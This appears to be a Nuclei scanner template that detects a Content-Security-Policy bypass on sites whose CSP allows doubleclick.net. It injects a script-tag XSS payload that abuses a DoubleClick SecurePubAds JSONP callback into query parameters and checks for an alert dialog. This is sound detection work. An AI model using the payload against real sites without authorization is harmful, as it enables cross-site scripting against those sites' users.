id: doubleclick-securepubads-csp-bypass
info:
name: Content-Security-Policy Bypass - DoubleClick SecurePubAds
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,doubleclick-securepubads,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "doubleclick.net"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: doubleclick_securepubads_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://securepubads.g.doubleclick.net/gampad/ads?gdfp_req=1&output=json_html&iu=%2F32173961%2Fdesktop%2Ffrontpage%2Flisting&sz=300x250&url=https%3A%2F%2Fwww.reddit.com%2F&vrg=147&callback=alert"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "doubleclick_securepubads_csp_xss == true"
# digest: 490a0046304402201f945fd503663026af4ec7a35644b5068fe61c9ddef54675bd1f65ef5587d73c02205f6f4760a05dd5f58356f5a29b70fee058ef20821b7a648d4145c8110a52f18b:922c64590222798bb761d5b6d8e72950